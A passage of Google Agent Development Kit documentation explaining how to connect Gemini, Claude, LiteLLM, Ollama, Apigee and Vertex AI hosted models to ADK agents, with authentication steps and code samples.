You can find the full code sample [here](https://github.com/google/adk-docs/blob/main/examples/typescript/snippets/agents/workflow-agents/hitl_confirmation_agent.ts).

### Combining Patterns

These patterns provide starting points for structuring your multi-agent systems. You can mix and match them as needed to create the most effective architecture for your specific application.

# AI Models for ADK agents

Supported in ADK: Python, TypeScript, Go, Java

Agent Development Kit (ADK) is designed for flexibility, allowing you to integrate various Large Language Models (LLMs) into your agents. This section details how to leverage Gemini and integrate other popular models effectively, including those hosted externally or running locally.
ADK primarily uses two mechanisms for model integration:

1. **Direct String / Registry:** For models tightly integrated with Google Cloud, such as Gemini models accessed via Google AI Studio or Vertex AI, or models hosted on Vertex AI endpoints. You access these models by providing the model name or endpoint resource string, and ADK's internal registry resolves this string to the appropriate backend client.
   - [Gemini models](/adk-docs/agents/models/google-gemini/)
   - [Claude models](/adk-docs/agents/models/anthropic/)
   - [Vertex AI hosted models](/adk-docs/agents/models/vertex/)
1. **Model connectors:** For broader compatibility, especially models outside the Google ecosystem or those requiring specific client configurations, such as models accessed via Apigee or LiteLLM. You instantiate a specific wrapper class, such as `ApigeeLlm` or `LiteLlm`, and pass this object as the `model` parameter to your `LlmAgent`.
   - [Apigee models](/adk-docs/agents/models/apigee/)
   - [LiteLLM models](/adk-docs/agents/models/litellm/)
   - [Ollama model hosting](/adk-docs/agents/models/ollama/)
   - [vLLM model hosting](/adk-docs/agents/models/vllm/)

# Claude models for ADK agents

Supported in ADK: Java v0.2.0

You can integrate Anthropic's Claude models into your Java ADK applications with ADK's `Claude` wrapper class, using either an Anthropic API key or a Vertex AI backend. For access through Google Cloud Vertex AI services, see the [Third-Party Models on Vertex AI](/adk-docs/agents/models/vertex/#third-party-models-on-vertex-ai-eg-anthropic-claude) section. In Python, you can use Anthropic models through the [LiteLLM](/adk-docs/agents/models/litellm/) library.
## Get started

The following code example shows a basic implementation for using Claude models in your agents:

```java
public static LlmAgent createAgent() {
  AnthropicClient anthropicClient = AnthropicOkHttpClient.builder()
      .apiKey("ANTHROPIC_API_KEY")
      .build();

  Claude claudeModel = new Claude(
      "claude-3-7-sonnet-latest", anthropicClient
  );

  return LlmAgent.builder()
      .name("claude_direct_agent")
      .model(claudeModel)
      .instruction("You are a helpful AI assistant powered by Anthropic Claude.")
      .build();
}
```

## Prerequisites

1. **Dependencies:**
   - **Anthropic SDK Classes (Transitive):** The Java ADK's `com.google.adk.models.Claude` wrapper relies on classes from Anthropic's official Java SDK. These are typically included as *transitive dependencies*. For more information, see the [Anthropic Java SDK](https://github.com/anthropics/anthropic-sdk-java).
1. **Anthropic API Key:**
   - Obtain an API key from Anthropic. Securely manage this key using a secret manager.

## Example implementation

Instantiate `com.google.adk.models.Claude`, providing the desired Claude model name and an `AnthropicOkHttpClient` configured with your API key.
Then, pass the `Claude` instance to your `LlmAgent`, as shown in the following example:

```java
import com.anthropic.client.AnthropicClient;
import com.google.adk.agents.LlmAgent;
import com.google.adk.models.Claude;
import com.anthropic.client.okhttp.AnthropicOkHttpClient; // From Anthropic's SDK

public class DirectAnthropicAgent {

  private static final String CLAUDE_MODEL_ID = "claude-3-7-sonnet-latest"; // Or your preferred Claude model

  public static LlmAgent createAgent() {
    // "ANTHROPIC_API_KEY" is a placeholder. It's recommended to load
    // sensitive keys from a secure config.
    AnthropicClient anthropicClient = AnthropicOkHttpClient.builder()
        .apiKey("ANTHROPIC_API_KEY")
        .build();

    Claude claudeModel = new Claude(
        CLAUDE_MODEL_ID,
        anthropicClient
    );

    return LlmAgent.builder()
        .name("claude_direct_agent")
        .model(claudeModel)
        .instruction("You are a helpful AI assistant powered by Anthropic Claude.")
        // ... other LlmAgent configurations
        .build();
  }

  public static void main(String[] args) {
    try {
      LlmAgent agent = createAgent();
      System.out.println("Successfully created direct Anthropic agent: " + agent.name());
    } catch (IllegalStateException e) {
      System.err.println("Error creating agent: " + e.getMessage());
    }
  }
}
```

# Apigee AI Gateway for ADK agents

Supported in ADK: Python v1.18.0, Java v0.4.0

[Apigee](https://docs.cloud.google.com/apigee/docs/api-platform/get-started/what-apigee) provides a powerful [AI Gateway](https://cloud.google.com/solutions/apigee-ai), transforming how you manage and govern your generative AI model traffic. By exposing your AI model endpoint (like Vertex AI or the Gemini API) through an Apigee proxy, you immediately gain enterprise-grade capabilities:

- **Model Safety:** Implement security policies like Model Armor for threat protection.
- **Traffic Governance:** Enforce Rate Limiting and Token Limiting to manage costs and prevent abuse.
- **Performance:** Improve response times and efficiency using Semantic Caching and advanced model routing.
- **Monitoring & Visibility:** Get granular monitoring, analysis, and auditing of all your AI requests.

**Note:** The `ApigeeLlm` wrapper is currently designed for use with Vertex AI and the Gemini API (generateContent). We are continually expanding support for other models and interfaces.

## Example implementation

Integrate Apigee's governance into your agent's workflow by instantiating the `ApigeeLlm` wrapper object and passing it to an `LlmAgent` or other agent type.

```python
from google.adk.agents import LlmAgent
from google.adk.models.apigee_llm import ApigeeLlm

# Instantiate the ApigeeLlm wrapper
model = ApigeeLlm(
    # Specify the Apigee route to your model. For more info, check out the
    # ApigeeLlm documentation
    # (https://github.com/google/adk-python/tree/main/contributing/samples/hello_world_apigeellm).
    model="apigee/gemini-2.5-flash",
    # The proxy URL of your deployed Apigee proxy including the base path
    proxy_url=f"https://{APIGEE_PROXY_URL}",
    # Pass necessary authentication/authorization headers (like an API key)
    custom_headers={"foo": "bar"}
)

# Pass the configured model wrapper to your LlmAgent
agent = LlmAgent(
    model=model,
    name="my_governed_agent",
    instruction="You are a helpful assistant powered by Gemini and governed by Apigee.",
    # ... other agent parameters
)
```

```java
import com.google.adk.agents.LlmAgent;
import com.google.adk.models.ApigeeLlm;
import com.google.common.collect.ImmutableMap;

ApigeeLlm apigeeLlm = ApigeeLlm.builder()
    .modelName("apigee/gemini-2.5-flash") // Specify the Apigee route to your model.
For more info, check out the ApigeeLlm documentation .proxyUrl(APIGEE_PROXY_URL) //The proxy URL of your deployed Apigee proxy including the base path .customHeaders(ImmutableMap.of("foo", "bar")) //Pass necessary authentication/authorization headers (like an API key) .build(); LlmAgent agent = LlmAgent.builder() .model(apigeeLlm) .name("my_governed_agent") .description("my_governed_agent") .instruction("You are a helpful assistant powered by Gemini and governed by Apigee.") // tools will be added next .build(); ``` With this configuration, every API call from your agent will be routed through Apigee first, where all necessary policies (security, rate limiting, logging) are executed before the request is securely forwarded to the underlying AI model endpoint. For a full code example using the Apigee proxy, see [Hello World Apigee LLM](https://github.com/google/adk-python/tree/main/contributing/samples/hello_world_apigeellm). # Google Gemini models for ADK agents Supported in ADKPython v0.1.0Typescript v0.2.0Go v0.1.0Java v0.2.0 ADK supports the Google Gemini family of generative AI models that provide a powerful set of models with a wide range of features. ADK provides support for many Gemini features, including [Code Execution](/adk-docs/tools/gemini-api/code-execution/), [Google Search](/adk-docs/tools/gemini-api/google-search/), [Context caching](/adk-docs/context/caching/), [Computer use](/adk-docs/tools/gemini-api/computer-use/) and the [Interactions API](#interactions-api). ## Get started The following code examples show a basic implementation for using Gemini models in your agents: ```python from google.adk.agents import LlmAgent # --- Example using a stable Gemini Flash model --- agent_gemini_flash = LlmAgent( # Use the latest stable Flash model identifier model="gemini-2.5-flash", name="gemini_flash_agent", instruction="You are a fast and helpful Gemini assistant.", # ... 
other agent parameters
)
```

```typescript
import {LlmAgent} from '@google/adk';

// --- Example using a stable Gemini Flash model ---
export const rootAgent = new LlmAgent({
  name: 'hello_time_agent',
  model: 'gemini-2.5-flash',
  description: 'Gemini flash agent',
  instruction: `You are a fast and helpful Gemini assistant.`,
});
```

```go
import (
    "log"

    "google.golang.org/adk/agent/llmagent"
    "google.golang.org/adk/model/gemini"
    "google.golang.org/genai"
)

// --- Example using a stable Gemini Flash model ---
// Assumes ctx is a context.Context created by the caller.
modelFlash, err := gemini.NewModel(ctx, "gemini-2.0-flash", &genai.ClientConfig{})
if err != nil {
    log.Fatalf("failed to create model: %v", err)
}
agentGeminiFlash, err := llmagent.New(llmagent.Config{
    // Use the latest stable Flash model identifier
    Model:       modelFlash,
    Name:        "gemini_flash_agent",
    Instruction: "You are a fast and helpful Gemini assistant.",
    // ... other agent parameters
})
if err != nil {
    log.Fatalf("failed to create agent: %v", err)
}
```

```java
// --- Example using a stable Gemini Flash model configured through ENV variables ---
LlmAgent agentGeminiFlash =
    LlmAgent.builder()
        // Use the latest stable Flash model identifier
        .model("gemini-2.5-flash") // Set ENV variables to use this model
        .name("gemini_flash_agent")
        .instruction("You are a fast and helpful Gemini assistant.")
        // ... other agent parameters
        .build();
```

## Gemini model authentication

This section covers authenticating with Google's Gemini models, either through Google AI Studio for rapid development or Google Cloud Vertex AI for enterprise applications. This is the most direct way to use Google's flagship models within ADK.

**Integration Method:** Once you are authenticated using one of the methods below, you can pass the model's identifier string directly to the `model` parameter of `LlmAgent`.

Tip

The `google-genai` library, used internally by ADK for Gemini models, can connect through either Google AI Studio or Vertex AI.
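The choice between the two backends is driven by environment variables that the following subsections describe. As a rough sketch only, the helper below reports which backend a given environment appears to select and which variables still look unset. `describe_gemini_backend` is a hypothetical name and is not part of ADK or `google-genai`; the truthy values it accepts for `GOOGLE_GENAI_USE_VERTEXAI` (`true` or `1`, case-insensitive) are an assumption rather than documented behavior.

```python
import os


def describe_gemini_backend(env=None):
    """Return (backend_name, missing_variables) for an environment mapping.

    Hypothetical preflight helper; it only inspects variables and never
    contacts Google AI Studio or Vertex AI.
    """
    env = os.environ if env is None else env
    flag = env.get("GOOGLE_GENAI_USE_VERTEXAI", "").strip().lower()
    use_vertex = flag in ("true", "1")  # assumed truthy spellings

    if not use_vertex:
        backend = "Google AI Studio"
        required = ["GOOGLE_API_KEY"]
    elif env.get("GOOGLE_API_KEY"):
        # Vertex AI flag plus an API key matches the Express Mode setup.
        backend = "Vertex AI (Express Mode)"
        required = []
    else:
        backend = "Vertex AI"
        required = ["GOOGLE_CLOUD_PROJECT", "GOOGLE_CLOUD_LOCATION"]

    missing = [name for name in required if not env.get(name)]
    return backend, missing


if __name__ == "__main__":
    backend, missing = describe_gemini_backend()
    print(f"Backend: {backend}; missing variables: {missing or 'none'}")
```

Running a check like this before starting an agent can surface a missing variable early, instead of as an authentication error on the first model call.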
**Model support for voice/video streaming** In order to use voice/video streaming in ADK, you will need to use Gemini models that support the Live API. You can find the **model ID(s)** that support the Gemini Live API in the documentation: - [Google AI Studio: Gemini Live API](https://ai.google.dev/gemini-api/docs/models#live-api) - [Vertex AI: Gemini Live API](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api) ### Google AI Studio This is the simplest method and is recommended for getting started quickly. - **Authentication Method:** API Key - **Setup:** 1. **Get an API key:** Obtain your key from [Google AI Studio](https://aistudio.google.com/apikey). 1. **Set environment variables:** Create a `.env` file (Python) or `.properties` (Java) in your project's root directory and add the following lines. ADK will automatically load this file. ```shell export GOOGLE_API_KEY="YOUR_GOOGLE_API_KEY" export GOOGLE_GENAI_USE_VERTEXAI=FALSE ``` (or) Pass these variables during the model initialization via the `Client` (see example below). - **Models:** Find all available models on the [Google AI for Developers site](https://ai.google.dev/gemini-api/docs/models). ### Google Cloud Vertex AI For scalable and production-oriented use cases, Vertex AI is the recommended platform. Gemini on Vertex AI supports enterprise-grade features, security, and compliance controls. Based on your development environment and usecase, *choose one of the below methods to authenticate*. **Pre-requisites:** A Google Cloud Project with [Vertex AI enabled](https://console.cloud.google.com/apis/enableflow;apiid=aiplatform.googleapis.com). ### **Method A: User Credentials (for Local Development)** 1. **Install the gcloud CLI:** Follow the official [installation instructions](https://cloud.google.com/sdk/docs/install). 1. **Log in using ADC:** This command opens a browser to authenticate your user account for local development. ```bash gcloud auth application-default login ``` 1. 
**Set environment variables:** ```shell export GOOGLE_CLOUD_PROJECT="YOUR_PROJECT_ID" export GOOGLE_CLOUD_LOCATION="YOUR_VERTEX_AI_LOCATION" # e.g., us-central1 ``` Explicitly tell the library to use Vertex AI: ```shell export GOOGLE_GENAI_USE_VERTEXAI=TRUE ``` 1. **Models:** Find available model IDs in the [Vertex AI documentation](https://cloud.google.com/vertex-ai/generative-ai/docs/learn/models). ### **Method B: Vertex AI Express Mode** [Vertex AI Express Mode](https://cloud.google.com/vertex-ai/generative-ai/docs/start/express-mode/overview) offers a simplified, API-key-based setup for rapid prototyping. 1. **Sign up for Express Mode** to get your API key. 1. **Set environment variables:** ```shell export GOOGLE_API_KEY="PASTE_YOUR_EXPRESS_MODE_API_KEY_HERE" export GOOGLE_GENAI_USE_VERTEXAI=TRUE ``` ### **Method C: Service Account (for Production & Automation)** For deployed applications, a service account is the standard method. 1. [**Create a Service Account**](https://cloud.google.com/iam/docs/service-accounts-create#console) and grant it the `Vertex AI User` role. 1. **Provide credentials to your application:** - **On Google Cloud:** If you are running the agent in Cloud Run, GKE, VM or other Google Cloud services, the environment can automatically provide the service account credentials. You don't have to create a key file. - **Elsewhere:** Create a [service account key file](https://cloud.google.com/iam/docs/keys-create-delete#console) and point to it with an environment variable: ```bash export GOOGLE_APPLICATION_CREDENTIALS="/path/to/your/keyfile.json" ``` Instead of the key file, you can also authenticate the service account using Workload Identity. But this is outside the scope of this guide. Secure Your Credentials Service account credentials or API keys are powerful credentials. Never expose them publicly. 
Use a secret manager such as [Google Cloud Secret Manager](https://cloud.google.com/security/products/secret-manager) to store and access them securely in production.

Gemini model versions

Always check the official Gemini documentation for the latest model names, including specific preview versions if needed. Preview models might have different availability or quota limitations.

## Troubleshooting

### Error Code 429 - RESOURCE_EXHAUSTED

This error usually occurs when the number of your requests exceeds the capacity allocated to process them.

To mitigate this, you can do one of the following:

1. Request higher quota limits for the model you are trying to use.
1. Enable client-side retries. Retries allow the client to automatically retry the request after a delay, which can help if the quota issue is temporary.

There are two ways you can set retry options:

**Option 1:** Set retry options on the Agent as part of `generate_content_config`. Use this option when you pass the model as an identifier string and do not instantiate the model adapter yourself.

```python
from google.adk.agents.llm_agent import Agent
from google.genai import types

root_agent = Agent(
    model='gemini-2.5-flash',
    # ... other agent parameters
    generate_content_config=types.GenerateContentConfig(
        # ... other generation settings
        http_options=types.HttpOptions(
            # Wait 1 second before the first retry; make at most 2 attempts
            retry_options=types.HttpRetryOptions(initial_delay=1, attempts=2),
        ),
    ),
)
```

**Option 2:** Set retry options on the model adapter. Use this option when you instantiate the `Gemini` model adapter yourself.

```python
from google.adk.agents.llm_agent import Agent
from google.adk.models.google_llm import Gemini
from google.genai import types

# ...

agent = Agent(
    model=Gemini(
        retry_options=types.HttpRetryOptions(initial_delay=1, attempts=2),
    )
)
```

## Gemini Interactions API

Supported in ADK: Python v1.21.0

The Gemini [Interactions API](https://ai.google.dev/gemini-api/docs/interactions) is an alternative to the ***generateContent*** inference API. It provides stateful conversation capabilities, allowing you to chain interactions using a `previous_interaction_id` instead of sending the full conversation history with each request.
Using this feature can be more efficient for long conversations.

You can enable the Interactions API by setting the `use_interactions_api=True` parameter in the Gemini model configuration, as shown in the following code snippet:

```python
from google.adk.agents.llm_agent import Agent
from google.adk.models.google_llm import Gemini
from google.adk.tools.google_search_tool import GoogleSearchTool

root_agent = Agent(
    model=Gemini(
        model="gemini-2.5-flash",
        use_interactions_api=True,  # Enable Interactions API
    ),
    name="interactions_test_agent",
    tools=[
        GoogleSearchTool(bypass_multi_tools_limit=True),  # Converted to function tool
        get_current_weather,  # Custom function tool (defined elsewhere)
    ],
)
```

For a complete code sample, see the [Interactions API sample](https://github.com/google/adk-python/tree/main/contributing/samples/interactions_api).

### Known limitations

The Interactions API **does not** support mixing custom function calling tools with built-in tools, such as the [Google Search](/adk-docs/tools/built-in-tools/#google-search) tool, within the same agent. You can work around this limitation by configuring the built-in tool to operate as a custom tool using the `bypass_multi_tools_limit` parameter:

```python
# Use bypass_multi_tools_limit=True to convert google_search to a function tool
GoogleSearchTool(bypass_multi_tools_limit=True)
```

In this example, this option converts the built-in google_search to a function calling tool (via GoogleSearchAgentTool), which allows it to work alongside custom function tools.

# LiteLLM model connector for ADK agents

Supported in ADK: Python v0.1.0

[LiteLLM](https://docs.litellm.ai/) is a Python library that acts as a translation layer for models and model hosting services, providing a standardized, OpenAI-compatible interface to more than 100 LLMs. ADK provides integration through the LiteLLM library, allowing you to access a vast range of LLMs from providers like OpenAI, Anthropic (non-Vertex AI), Cohere, and many others.
You can run open-source models locally or self-host them and integrate them using LiteLLM for operational control, cost savings, privacy, or offline use cases. You can use the LiteLLM library to access remote or locally hosted AI models: - **Remote model host:** Use the `LiteLlm` wrapper class and set it as the `model` parameter of `LlmAgent`. - **Local model host:** Use the `LiteLlm` wrapper class configured to point to your local model server. For examples of local model hosting solutions, see the [Ollama](/adk-docs/agents/models/ollama/) or [vLLM](/adk-docs/agents/models/vllm/) documentation. Windows Encoding with LiteLLM When using ADK agents with LiteLLM on Windows, you might encounter a `UnicodeDecodeError`. This error occurs because LiteLLM may attempt to read cached files using the default Windows encoding (`cp1252`) instead of UTF-8. Prevent this error by setting the `PYTHONUTF8` environment variable to `1`. This forces Python to use UTF-8 for all file I/O. **Example (PowerShell):** ```powershell # Set for the current session $env:PYTHONUTF8 = "1" # Set persistently for the user [System.Environment]::SetEnvironmentVariable('PYTHONUTF8', '1', [System.EnvironmentVariableTarget]::User) ``` ## Setup 1. **Install LiteLLM:** ```shell pip install litellm ``` 1. **Set Provider API Keys:** Configure API keys as environment variables for the specific providers you intend to use. 
    - *Example for OpenAI:*

      ```shell
      export OPENAI_API_KEY="YOUR_OPENAI_API_KEY"
      ```

    - *Example for Anthropic (non-Vertex AI):*

      ```shell
      export ANTHROPIC_API_KEY="YOUR_ANTHROPIC_API_KEY"
      ```

    - *Consult the [LiteLLM Providers Documentation](https://docs.litellm.ai/docs/providers) for the correct environment variable names for other providers.*

## Example implementation

```python
from google.adk.agents import LlmAgent
from google.adk.models.lite_llm import LiteLlm

# --- Example Agent using OpenAI's GPT-4o ---
# (Requires OPENAI_API_KEY)
agent_openai = LlmAgent(
    model=LiteLlm(model="openai/gpt-4o"),  # LiteLLM model string format
    name="openai_agent",
    instruction="You are a helpful assistant powered by GPT-4o.",
    # ... other agent parameters
)

# --- Example Agent using Anthropic's Claude Haiku (non-Vertex) ---
# (Requires ANTHROPIC_API_KEY)
agent_claude_direct = LlmAgent(
    model=LiteLlm(model="anthropic/claude-3-haiku-20240307"),
    name="claude_direct_agent",
    instruction="You are an assistant powered by Claude Haiku.",
    # ... other agent parameters
)
```

# Ollama model host for ADK agents

Supported in ADK: Python v0.1.0

[Ollama](https://ollama.com/) is a tool that allows you to host and run open-source models locally. ADK integrates with Ollama-hosted models through the [LiteLLM](/adk-docs/agents/models/litellm/) model connector library.

## Get started

Use the LiteLLM wrapper to create agents with Ollama-hosted models. The following code example shows a basic implementation for using Gemma open models with your agents:

```py
from google.adk.agents import Agent
from google.adk.models.lite_llm import LiteLlm

# roll_die and check_prime are function tools defined elsewhere in your project.
root_agent = Agent(
    model=LiteLlm(model="ollama_chat/gemma3:latest"),
    name="dice_agent",
    description=(
        "hello world agent that can roll a dice of 8 sides and check prime"
        " numbers."
    ),
    instruction="""
      You roll dice and answer questions about the outcome of the dice rolls.
    """,
    tools=[
        roll_die,
        check_prime,
    ],
)
```

Warning: Use `ollama_chat` interface

Make sure you set the provider `ollama_chat` instead of `ollama`.
Using `ollama` can result in unexpected behaviors such as infinite tool call loops and ignoring previous context.

Use `OLLAMA_API_BASE` environment variable

Although you can specify the `api_base` parameter in LiteLLM for generation, as of v1.65.5, the library relies on the environment variable for other API calls. Therefore, you should set the `OLLAMA_API_BASE` environment variable to your Ollama server URL to ensure all requests are routed correctly.

```bash
export OLLAMA_API_BASE="http://localhost:11434"
adk web
```

## Model choice

If your agent relies on tools, select a model with tool support from the [Ollama website](https://ollama.com/search?c=tools). You can check tool support for a model using the following command:

```bash
ollama show mistral-small3.1
  Model
    architecture        mistral3
    parameters          24.0B
    context length      131072
    embedding length    5120
    quantization        Q4_K_M

  Capabilities
    completion
    vision
    tools
```

You should see **tools** listed under capabilities.

You can also look at the template the model is using and tweak it based on your needs.

```bash
ollama show --modelfile llama3.2 > model_file_to_modify
```

For instance, the default template for the above model suggests that the model should always call a function. This may result in an infinite loop of function calls.

```text
Given the following functions, please respond with a JSON for a function call
with its proper arguments that best answers the given prompt.

Respond in the format {"name": function name, "parameters": dictionary of
argument name and its value}. Do not use variables.
```

You can swap such prompts with a more descriptive one to prevent infinite tool call loops, for instance:

```text
Review the user's prompt and the available functions listed below. First, determine if calling one of these functions is the most appropriate way to respond.
A function call is likely needed if the prompt asks for a specific action, requires external data lookup, or involves calculations handled by the functions. If the prompt is a general question or can be answered directly, a function call is likely NOT needed. If you determine a function call IS required: Respond ONLY with a JSON object in the format {"name": "function_name", "parameters": {"argument_name": "value"}}. Ensure parameter values are concrete, not variables. If you determine a function call IS NOT required: Respond directly to the user's prompt in plain text, providing the answer or information requested. Do not output any JSON. ``` Then you can create a new model with the following command: ```bash ollama create llama3.2-modified -f model_file_to_modify ``` ## Use OpenAI provider Alternatively, you can use `openai` as the provider name. This approach requires setting the `OPENAI_API_BASE=http://localhost:11434/v1` and `OPENAI_API_KEY=anything` env variables instead of `OLLAMA_API_BASE`. Note that the `API_BASE` value has *`/v1`* at the end. ```py root_agent = Agent( model=LiteLlm(model="openai/mistral-small3.1"), name="dice_agent", description=( "hello world agent that can roll a dice of 8 sides and check prime" " numbers." ), instruction=""" You roll dice and answer questions about the outcome of the dice rolls. """, tools=[ roll_die, check_prime, ], ) ``` ```bash export OPENAI_API_BASE=http://localhost:11434/v1 export OPENAI_API_KEY=anything adk web ``` ### Debugging You can see the request sent to the Ollama server by adding the following in your agent code just after imports. ```py import litellm litellm._turn_on_debug() ``` Look for a line like the following: ```bash Request Sent from LiteLLM: curl -X POST \ http://localhost:11434/api/chat \ -d '{'model': 'mistral-small3.1', 'messages': [{'role': 'system', 'content': ... 
``` # Vertex AI hosted models for ADK agents For enterprise-grade scalability, reliability, and integration with Google Cloud's MLOps ecosystem, you can use models deployed to Vertex AI Endpoints. This includes models from Model Garden or your own fine-tuned models. **Integration Method:** Pass the full Vertex AI Endpoint resource string (`projects/PROJECT_ID/locations/LOCATION/endpoints/ENDPOINT_ID`) directly to the `model` parameter of `LlmAgent`. ## Vertex AI Setup Ensure your environment is configured for Vertex AI: 1. **Authentication:** Use Application Default Credentials (ADC): ```shell gcloud auth application-default login ``` 1. **Environment Variables:** Set your project and location: ```shell export GOOGLE_CLOUD_PROJECT="YOUR_PROJECT_ID" export GOOGLE_CLOUD_LOCATION="YOUR_VERTEX_AI_LOCATION" # e.g., us-central1 ``` 1. **Enable Vertex Backend:** Crucially, ensure the `google-genai` library targets Vertex AI: ```shell export GOOGLE_GENAI_USE_VERTEXAI=TRUE ``` ## Model Garden Deployments Supported in ADKPython v0.2.0 You can deploy various open and proprietary models from the [Vertex AI Model Garden](https://console.cloud.google.com/vertex-ai/model-garden) to an endpoint. **Example:** ```python from google.adk.agents import LlmAgent from google.genai import types # For config objects # --- Example Agent using a Llama 3 model deployed from Model Garden --- # Replace with your actual Vertex AI Endpoint resource name llama3_endpoint = "projects/YOUR_PROJECT_ID/locations/us-central1/endpoints/YOUR_LLAMA3_ENDPOINT_ID" agent_llama3_vertex = LlmAgent( model=llama3_endpoint, name="llama3_vertex_agent", instruction="You are a helpful assistant based on Llama 3, hosted on Vertex AI.", generate_content_config=types.GenerateContentConfig(max_output_tokens=2048), # ... 
other agent parameters ) ``` ## Fine-tuned Model Endpoints Supported in ADKPython v0.2.0 Deploying your fine-tuned models (whether based on Gemini or other architectures supported by Vertex AI) results in an endpoint that can be used directly. **Example:** ```python from google.adk.agents import LlmAgent # --- Example Agent using a fine-tuned Gemini model endpoint --- # Replace with your fine-tuned model's endpoint resource name finetuned_gemini_endpoint = "projects/YOUR_PROJECT_ID/locations/us-central1/endpoints/YOUR_FINETUNED_ENDPOINT_ID" agent_finetuned_gemini = LlmAgent( model=finetuned_gemini_endpoint, name="finetuned_gemini_agent", instruction="You are a specialized assistant trained on specific data.", # ... other agent parameters ) ``` ## Anthropic Claude on Vertex AI Supported in ADKPython v0.2.0Java v0.1.0 Some providers, like Anthropic, make their models available directly through Vertex AI. **Integration Method:** Uses the direct model string (e.g., `"claude-3-sonnet@20240229"`), *but requires manual registration* within ADK. **Why Registration?** ADK's registry automatically recognizes `gemini-*` strings and standard Vertex AI endpoint strings (`projects/.../endpoints/...`) and routes them via the `google-genai` library. For other model types used directly via Vertex AI (like Claude), you must explicitly tell the ADK registry which specific wrapper class (`Claude` in this case) knows how to handle that model identifier string with the Vertex AI backend. **Setup:** 1. **Vertex AI Environment:** Ensure the consolidated Vertex AI setup (ADC, Env Vars, `GOOGLE_GENAI_USE_VERTEXAI=TRUE`) is complete. 1. **Install Provider Library:** Install the necessary client library configured for Vertex AI. ```shell pip install "anthropic[vertex]" ``` 1. 
**Register Model Class:** Add this code near the start of your application, *before* creating an agent using the Claude model string: ```python # Required for using Claude model strings directly via Vertex AI with LlmAgent from google.adk.models.anthropic_llm import Claude from google.adk.models.registry import LLMRegistry LLMRegistry.register(Claude) ``` **Example:** ```python from google.adk.agents import LlmAgent from google.adk.models.anthropic_llm import Claude # Import needed for registration from google.adk.models.registry import LLMRegistry # Import needed for registration from google.genai import types # --- Register Claude class (do this once at startup) --- LLMRegistry.register(Claude) # --- Example Agent using Claude 3 Sonnet on Vertex AI --- # Standard model name for Claude 3 Sonnet on Vertex AI claude_model_vertexai = "claude-3-sonnet@20240229" agent_claude_vertexai = LlmAgent( model=claude_model_vertexai, # Pass the direct string after registration name="claude_vertexai_agent", instruction="You are an assistant powered by Claude 3 Sonnet on Vertex AI.", generate_content_config=types.GenerateContentConfig(max_output_tokens=4096), # ... other agent parameters ) ``` **Integration Method:** Directly instantiate the provider-specific model class (e.g., `com.google.adk.models.Claude`) and configure it with a Vertex AI backend. **Why Direct Instantiation?** The Java ADK's `LlmRegistry` primarily handles Gemini models by default. For third-party models like Claude on Vertex AI, you directly provide an instance of the ADK's wrapper class (e.g., `Claude`) to the `LlmAgent`. This wrapper class is responsible for interacting with the model via its specific client library, configured for Vertex AI. **Setup:** 1. **Vertex AI Environment:** - Ensure your Google Cloud project and region are correctly set up. - **Application Default Credentials (ADC):** Make sure ADC is configured correctly in your environment. 
This is typically done by running `gcloud auth application-default login`. The Java client libraries use these credentials to authenticate with Vertex AI. Follow the [Google Cloud Java documentation on ADC](https://cloud.google.com/java/docs/reference/google-auth-library/latest/com.google.auth.oauth2.GoogleCredentials#com_google_auth_oauth2_GoogleCredentials_getApplicationDefault__) for detailed setup. 1. **Provider Library Dependencies:** - **Third-Party Client Libraries (Often Transitive):** The ADK core library often includes the necessary client libraries for common third-party models on Vertex AI (like Anthropic's required classes) as **transitive dependencies**. This means you might not need to explicitly add a separate dependency for the Anthropic Vertex SDK in your `pom.xml` or `build.gradle`. 1. **Instantiate and Configure the Model:** When creating your `LlmAgent`, instantiate the `Claude` class (or the equivalent for another provider) and configure its `VertexBackend`. **Example:** ```java import com.anthropic.client.AnthropicClient; import com.anthropic.client.okhttp.AnthropicOkHttpClient; import com.anthropic.vertex.backends.VertexBackend; import com.google.adk.agents.LlmAgent; import com.google.adk.models.Claude; // ADK's wrapper for Claude import com.google.auth.oauth2.GoogleCredentials; import java.io.IOException; // ... 
other imports public class ClaudeVertexAiAgent { public static LlmAgent createAgent() throws IOException { // Model name for Claude 3 Sonnet on Vertex AI (or other versions) String claudeModelVertexAi = "claude-3-7-sonnet"; // Or any other Claude model // Configure the AnthropicOkHttpClient with the VertexBackend AnthropicClient anthropicClient = AnthropicOkHttpClient.builder() .backend( VertexBackend.builder() .region("us-east5") // Specify your Vertex AI region .project("your-gcp-project-id") // Specify your GCP Project ID .googleCredentials(GoogleCredentials.getApplicationDefault()) .build()) .build(); // Instantiate LlmAgent with the ADK Claude wrapper LlmAgent agentClaudeVertexAi = LlmAgent.builder() .model(new Claude(claudeModelVertexAi, anthropicClient)) // Pass the Claude instance .name("claude_vertexai_agent") .instruction("You are an assistant powered by Claude 3 Sonnet on Vertex AI.") // .generateContentConfig(...) // Optional: Add generation config if needed // ... other agent parameters .build(); return agentClaudeVertexAi; } public static void main(String[] args) { try { LlmAgent agent = createAgent(); System.out.println("Successfully created agent: " + agent.name()); // Here you would typically set up a Runner and Session to interact with the agent } catch (IOException e) { System.err.println("Failed to create agent: " + e.getMessage()); e.printStackTrace(); } } } ``` ## Open Models on Vertex AI Supported in ADKPython v0.1.0 Vertex AI offers a curated selection of open-source models, such as Meta Llama, through Model-as-a-Service (MaaS). These models are accessible via managed APIs, allowing you to deploy and scale without managing the underlying infrastructure. For a full list of available options, see the [Vertex AI open models for MaaS](https://docs.cloud.google.com/vertex-ai/generative-ai/docs/maas/use-open-models#open-models) documentation. 
You can use the [LiteLLM](https://docs.litellm.ai/) library to access open models like Meta's Llama on Vertex AI MaaS.

**Integration Method:** Use the `LiteLlm` wrapper class and set it as the `model` parameter of `LlmAgent`. For details on using LiteLLM in ADK, see the [LiteLLM model connector for ADK agents](/adk-docs/agents/models/litellm/#litellm-model-connector-for-adk-agents) documentation.

**Setup:**

1. **Vertex AI Environment:** Ensure the consolidated Vertex AI setup (ADC, Env Vars, `GOOGLE_GENAI_USE_VERTEXAI=TRUE`) is complete.

1. **Install LiteLLM:**

    ```shell
    pip install litellm
    ```

**Example:**

```python
from google.adk.agents import LlmAgent
from google.adk.models.lite_llm import LiteLlm

# --- Example Agent using Meta's Llama 4 Scout ---
agent_llama_vertexai = LlmAgent(
    model=LiteLlm(model="vertex_ai/meta/llama-4-scout-17b-16e-instruct-maas"),  # LiteLLM model string format
    name="llama4_agent",
    instruction="You are a helpful assistant powered by Llama 4 Scout.",
    # ... other agent parameters
)
```

# vLLM model host for ADK agents

Supported in ADK: Python v0.1.0

